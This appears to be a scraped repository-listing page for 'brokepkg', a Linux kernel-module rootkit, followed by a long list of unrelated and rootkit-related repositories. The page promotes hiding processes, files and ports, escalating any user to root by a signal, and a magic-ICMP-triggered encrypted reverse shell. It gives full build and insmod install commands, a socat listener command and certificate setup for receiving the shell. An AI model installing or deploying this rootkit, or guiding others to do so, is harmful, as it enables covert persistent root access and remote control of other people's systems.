BrokePkg

Brokepkg is a LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x and ARM64, with suport after kernel 5.7, without kallsyms_lookup_name.

Tested on

Kali linux: 5.10.0-kali3-amd64
Linux mint: 4.19.0-8-amd64

Features

Hide/unhide any process by sending a signal 63;

Sending a signal 31(to any pid) makes the module become (in)visible;

Sending a signal 64(to any pid) makes the given user become root;

Files or directories starting with the PREFIX become invisible;

Sending a signal 62 to some port you make he invisible;

Install

sudo apt install build-essential libncurses-dev linux-headers-$(uname -r)
git clone https://github.com/R3tr074/brokepkg
cd brokepkg
make
sudo insmod brokepkg.ko

Uninstall

Remove brokepkg invisibility to uninstall him

kill -31 0

Then remove the module

sudo rmmod brokepkg

References

LKM HACKING:
- http://www.ouah.org/LKM_HACKING.html
Diamorphine:
- https://github.com/m0nad/Diamorphine
TheXcellerator:
- https://xcellerator.github.io/posts/linux_rootkits_11/
- https://github.com/xcellerator/linux_kernel_hacking
Conviso:
- https://blog.convisoappsec.com/linux-rootkits-hooking-syscalls/
HardDisk:
- https://harddisk.com.br/p/pt-br-rootkits-explicados/

Backdoor full tty and traffic encrypted with openssl

How client work?

The brokecli send a icmp packet with the password, defined in backdoor header, magic number, also defined in the defined in backdoor header, host and port to receive reverse shell.

To use with ngrok is necessary 2 terminals, 1 to lister and other to send the packet, as in the example:

The lister use the socat, this mode:

socat file:`tty`,raw,echo=0 openssl-listen:<port to listen>,cert=<path to .pem file>,verify=0,fork

The client necessarily needs to have .pem, if you need create one run this:

openssl req -newkey rsa:2048 -nodes -keyout /tmp/brokepkg.key -x509 -days 1000 -subj '/CN=www.mydom.com/O=My Company Name LTD./C=US' -out /tmp/brokepkg.crt
cat /tmp/brokepkg.{key,crt} > /tmp/brokepkg.pem

Not forget use -q flag in your terminal to not crash if you use with the ngrok.

hashs

brokecli amd64

md5: f17b75e9eff63e7e1c258948037f8fd5
sha1: 5e3d3c24f29ffb36cdce4ac274f160857b8272b6

brokecli i386

md5: 0136e264cd07ed22d5434810110531c6
sha1: 572010f6493bc9f23d0a9148cda0d41757d06d94

Source code(tar.gz)
Source code(zip)
brokecli_0.8_amd64(17.67 KB)
brokecli_0.8_i386(16.38 KB)

Estudos sobre LKM - Linux Kernel Module.

Linux Kernel Module - Part 1 Explicação geral de toda estrutura do nosso LKM. Bom, temos aqui então todo nosso cabeçalho de includes de bibliotecas. V

7 May 5, 2022

Linux rootkit used to hide a cryptominer process and CPU usage.

44 Dec 31, 2022

LKM Command Line Parsing - Parte 2

LKM-Command-Line-Parsing 👾 Hoje iremos falar sobre Command Line Parsing diretamente no LKM. Esse é a segunda parte da nossa série de estudos para Roo

6 May 11, 2022

Minimal Linux Live (MLL) is a tiny educational Linux distribution, which is designed to be built from scratch by using a collection of automated shell scripts. Minimal Linux Live offers a core environment with just the Linux kernel, GNU C library, and Busybox userland utilities.

1.3k Jan 8, 2023

An attempt to restore and adapt to modern Win10 version the Rootkit Arsenal original code samples

rootkit-arsenal-guacamole An attempt to restore and adapt to modern Win10 version the Rootkit Arsenal original code samples All projects have been por

51 Nov 6, 2022

Windows x64 rootkit

P4tch3r Windows x64 rootkit (tested on Windows 7) It's PoC of patching NtTerminateProcess function by just overwriting instructions catching arguments

7 Jul 22, 2022

A simple Windows kernel rootkit.

Venom RootKit A simple windows rootkit that I have wrote, In order to explore a bit about the world of rootkits and windows kernel in general. The Ven

64 Oct 9, 2022

yark - Yet Another RootKit

yark - Yet Another RootKit How to Build Requirements In order to build the kernel module, you need to install the kernel-headers package corresponding

16 Nov 9, 2022

To have platform independent network interfaces over usb which is working with Linux, Windows, Mac OS ect.

To have platform independent network interfaces over usb which is working with Linux, Windows, Mac OS ect. called RNDIS. This project is a RNDIS demo, which addtionally implements a http server. It runs out of the box on a stm32f411 BlackPill board. My RNDIS library with an empty template for the second interface (which can ba UART, CAN, ETH or like in this demo a tcp/ip stack) can be found under following link: https://github.com/RDMsmartnetworks/STM32_HAL_RNDIS

17 Dec 24, 2022

Bond is a cross-platform framework for working with schematized data. It supports cross-language de/serialization and powerful generic mechanisms for efficiently manipulating data. Bond is broadly used at Microsoft in high scale services.

Bond Bond is an open-source, cross-platform framework for working with schematized data. It supports cross-language serialization/deserialization and

2.5k Dec 31, 2022

A simple C library for working with KD-Trees

kdtree Overview kdtree is a simple, easy to use C library for working with kd-trees. Kd-trees are an extension of binary search trees to k-dimensional

348 Dec 28, 2022

a playground for working with fully static tensors and automatic differentiation

This is a playground for learning about how to apply template-meta-programming to get more efficient evaluation for tensor-based automatic differentiation.

16 Mar 18, 2021

Terminal calculator made for programmers working with multiple number representations, sizes, and overall close to the bits

Programmer calculator The programmer calculator is a simple terminal tool designed to give maximum efficiency and flexibility to the programmer workin

183 Dec 24, 2022

Fork of Cutter from the last working commit with radare2

r2cutter r2cutter is the continuation of Cutter before the fork to keep radare2 as backend. Focus on supporting latest version of radare2 Recommend th

503 Jan 7, 2023

Colibri core is an NLP tool as well as a C++ and Python library for working with basic linguistic constructions such as n-grams and skipgrams (i.e patterns with one or more gaps, either of fixed or dynamic size) in a quick and memory-efficient way. At the core is the tool ``colibri-patternmodeller`` whi ch allows you to build, view, manipulate and query pattern models.

Colibri Core by Maarten van Gompel, [email protected], Radboud University Nijmegen Licensed under GPLv3 (See http://www.gnu.org/licenses/gpl-3.0.html

122 Nov 17, 2022

The PULP Ara is a 64-bit Vector Unit, compatible with the RISC-V Vector Extension Version 0.9, working as a coprocessor to CORE-V's CVA6 core

Ara Ara is a vector unit working as a coprocessor for the CVA6 core. It supports the RISC-V Vector Extension, version 0.9. Dependencies Check DEPENDEN

185 Dec 24, 2022

A guide and set of tools for working with TinyML powered Audio Sensors

Audio Sensor Toolkit This is a guide on how to build an Audio Sensor using Machine Learning, and helpful tools. Audio Sensor Guide Audio Tools Acceler

20 Sep 21, 2022

Servo library with stm developed by the Liek Software Team. We are working on new versions.

Liek-Servo-Library Liek Servo Library is a library that makes it easy for you to drive servo motors with STM32F10x series cards. The library is still

14 Nov 4, 2022

make error

make -C /lib/modules/3.10.0-327.el7.x86_64/build M=/tmp/brokepkg modules make: *** /lib/modules/3.10.0-327.el7.x86_64/build: No such file or directory. Stop. make: *** [all] Error 2

3.10.0-327.el7.x86_64 #1 SMP Thu Nov 19 22:10:57 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

CentOS Linux release 7.2.1511 (Core)

opened by shinegod 5

0.8(Apr 7, 2021)
Backdoor full tty and traffic encrypted with openssl

How client work?

The brokecli send a icmp packet with the password, defined in backdoor header, magic number, also defined in the defined in backdoor header, host and port to receive reverse shell.

To use with ngrok is necessary 2 terminals, 1 to lister and other to send the packet, as in the example:

The lister use the socat, this mode:

socat file:`tty`,raw,echo=0 openssl-listen:<port to listen>,cert=<path to .pem file>,verify=0,fork

The client necessarily needs to have .pem, if you need create one run this:

openssl req -newkey rsa:2048 -nodes -keyout /tmp/brokepkg.key -x509 -days 1000 -subj '/CN=www.mydom.com/O=My Company Name LTD./C=US' -out /tmp/brokepkg.crt cat /tmp/brokepkg.{key,crt} > /tmp/brokepkg.pem

Not forget use -q flag in your terminal to not crash if you use with the ngrok.

hashs

brokecli amd64

md5: f17b75e9eff63e7e1c258948037f8fd5

sha1: 5e3d3c24f29ffb36cdce4ac274f160857b8272b6

brokecli i386

md5: 0136e264cd07ed22d5434810110531c6

sha1: 572010f6493bc9f23d0a9148cda0d41757d06d94

Source code(tar.gz)
Source code(zip)
brokecli_0.8_amd64(17.67 KB)
brokecli_0.8_i386(16.38 KB)

The LKM rootkit working in Linux Kernels 2.6.x/3.x/4.x/5.x

Related tags

Overview

BrokePkg

Tested on

Features

Install

Uninstall

References

You might also like...

Estudos sobre LKM - Linux Kernel Module.

Linux rootkit used to hide a cryptominer process and CPU usage.

LKM Command Line Parsing - Parte 2

Minimal Linux Live (MLL) is a tiny educational Linux distribution, which is designed to be built from scratch by using a collection of automated shell scripts. Minimal Linux Live offers a core environment with just the Linux kernel, GNU C library, and Busybox userland utilities.

An attempt to restore and adapt to modern Win10 version the Rootkit Arsenal original code samples

Windows x64 rootkit

A simple Windows kernel rootkit.

LD_PRELOAD Rootkit

yark - Yet Another RootKit

To have platform independent network interfaces over usb which is working with Linux, Windows, Mac OS ect.

Bond is a cross-platform framework for working with schematized data. It supports cross-language de/serialization and powerful generic mechanisms for efficiently manipulating data. Bond is broadly used at Microsoft in high scale services.

A simple C library for working with KD-Trees

a playground for working with fully static tensors and automatic differentiation

Terminal calculator made for programmers working with multiple number representations, sizes, and overall close to the bits

Fork of Cutter from the last working commit with radare2

The PULP Ara is a 64-bit Vector Unit, compatible with the RISC-V Vector Extension Version 0.9, working as a coprocessor to CORE-V's CVA6 core

A guide and set of tools for working with TinyML powered Audio Sensors

Servo library with stm developed by the Liek Software Team. We are working on new versions.

Comments

make error

Releases(0.8)

0.8(Apr 7, 2021)

Backdoor full tty and traffic encrypted with openssl

How client work?

hashs

Owner

Jorge Buzeti

Complementary Concurrency Programs for course "Linux Kernel Internals"

A library OS for Linux multi-process applications, with Intel SGX support

High Performance Linux C++ Network Programming Framework based on IO Multiplexing and Thread Pool

A LKM rootkit targeting 4.x and 5.x kernel versions which opens a backdoor that can be used to spawn a reverse shell to a remote host and more.

LKM Rootkit Kernel 2016 (Updated)

64-bit LKM Rootkit builder based on yaml prescription

4.8 Rootkit Kernel LKM

✔️The smallest header-only GUI library(4 KLOC) for all platforms

A python library to run metal compute kernels on MacOS

How do I submit patches to Android Common Kernels